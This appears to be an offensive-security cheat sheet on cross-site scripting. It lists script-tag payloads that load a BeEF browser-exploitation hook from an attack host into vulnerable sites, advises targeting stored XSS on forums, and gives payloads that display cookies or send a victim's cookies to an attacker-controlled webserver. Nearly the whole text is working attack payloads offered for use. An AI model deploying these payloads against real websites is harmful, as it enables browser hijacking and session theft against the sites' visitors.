XSS – Cross Site Scripting
BeeF Framework
BeeF is native in Kali and is a browser exploitation framework.
From the vulnerable website insert below javascript to connect to BeeF hook on attack host.
As XSS is a Client Side attack, most useful on persistent / stored XSS, e.g. Messageboards, Forums.
4 examples:
1 2 3 4 5 6 7 8 |
<script type=text/javascript src=http://10.10.xx.xx:3000/hook.js></script> <script>window.location= http://10.10.xx.xx:3000/hook.js</script> <script type=”text/javascript” src=” http://10.10.xx.xx:3000/hook.js “></script> <script src=”http://10.10.xx.xx:3000/hook.js”></script> |
XSS Examples
Test for reflected XSS.
1 2 |
<script>alert(“XSS”)</script> |
Display / write out cookies.
1 2 |
<script>alert(document.cookie)</script> |
Drop users cookies on attacker webservice.
1 2 |
<script>window.location=’https://webserver/ghostface/?cookie=’+document.cookie</script> |